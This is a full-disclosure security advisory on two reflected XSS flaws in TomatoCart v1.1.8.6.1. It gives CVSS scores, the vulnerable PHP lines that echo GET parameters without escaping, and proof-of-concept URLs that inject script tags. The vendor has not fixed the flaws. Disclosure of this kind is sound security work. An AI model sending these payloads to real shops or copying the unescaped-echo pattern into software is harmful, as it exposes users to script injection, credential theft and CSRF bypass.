TomatoCart v1.1.8.6.1: XSS
Date: 2015-11-13 11:35:031. Introduction
| Affected Product: | TomatoCart v1.1.8.6.1 |
| Fixed in: | not fixed |
| Fixed Version Link: | n/a |
| Vendor Contact: | support@tomatocart.com |
| Vulnerability Type: | XSS |
| Remote Exploitable: | Yes |
| Reported to vendor: | 09/29/2015 |
| Disclosed to public: | 11/13/2015 |
| Release mode: | Full Disclosure |
| CVE: | n/a |
| Credits | Tim Coen of curesec GmbH |
2. Overview
There are two reflected XSS vulnerabilities in TomatoCart v1.1.8.6.1. With this, it is possible to inject JavaScript keyloggers, or to bypass CSRF protection, which in the case of TomatoCart may lead to code execution.
3. XSS 1
CVSS
Medium 4.3 AV:N/AC:M/Au:N/C:N/I:P/A:N
Proof of Concept
http://localhost/ecommerce/TomatoCart-v1-released-v1.1.8.6.1/info.php?faqs&faqs_id='"></script><script>alert(1)</script>
Code
templates/bootstrap/content/info/faqs.php:70
if(question.getParent().id == 'faq<?php echo $_GET['faqs_id']; ?>') {
question.getElement('i').set('class', 'icon-minus');
question.getNext().setStyle('display', '');
}
4. XSS 2
CVSS
Medium 4.3 AV:N/AC:M/Au:N/C:N/I:P/A:N
Proof of Concept
http://localhost/ecommerce/TomatoCart-v1-released-v1.1.8.6.1/checkout.php?checkout&view='"></script><script>alert(1)</script>
Code
templates/bootstrap/content/checkout/checkout.php:182
view: '<?php echo $_GET['view']; ?>',
5. Solution
This issue has not been fixed by the vendor
6. Report Timeline
| 09/29/2015 | Informed Vendor about Issue (no reply) |
| 10/21/2015 | Reminded Vendor of Disclosure Date (no reply) |
| 11/13/2015 | Disclosed to public |